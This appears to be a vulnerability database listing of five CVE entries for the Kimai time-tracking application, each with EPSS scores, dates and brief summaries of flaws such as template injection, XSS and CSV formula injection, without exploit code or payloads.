CVE-2024-4596
- EPSS 0.79%
- Veröffentlicht 07.05.2024 16:15:08
- Zuletzt bearbeitet 10.10.2025 18:16:29
A vulnerability was found in Kimai up to 2.15.0 and classified as problematic. Affected by this issue is some unknown functionality of the component Session Handler. The manipulation of the argument PHPSESSIONID leads to information disclosure. The a...
CVE-2024-29200
- EPSS 0.64%
- Veröffentlicht 28.03.2024 14:15:14
- Zuletzt bearbeitet 10.10.2025 17:30:34
Kimai is a web-based multi-user time-tracking application. The permission `view_other_timesheet` performs differently for the Kimai UI and the API, thus returning unexpected data through the API. When setting the `view_other_timesheet` permission to ...
CVE-2023-46245
- EPSS 1.47%
- Veröffentlicht 31.10.2023 16:15:09
- Zuletzt bearbeitet 21.11.2024 08:28:09
Kimai is a web-based multi-user time-tracking application. Versions prior to 2.1.0 are vulnerable to a Server-Side Template Injection (SSTI) which can be escalated to Remote Code Execution (RCE). The vulnerability arises when a malicious user uploads...
CVE-2020-19825
- EPSS 0.7%
- Veröffentlicht 15.02.2023 22:15:10
- Zuletzt bearbeitet 19.03.2025 19:15:37
Cross Site Scripting (XSS) vulnerability in kevinpapst kimai2 1.30.0 in /src/Twig/Runtime/MarkdownExtension.php, allows attackers to gain escalated privileges.
CVE-2021-43515
- EPSS 1%
- Veröffentlicht 08.04.2022 17:15:08
- Zuletzt bearbeitet 21.11.2024 06:29:20
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in creating new timesheet in Kimai. By filling the Description field with malicious payload, it will be mistreated while exporting to a CSV file.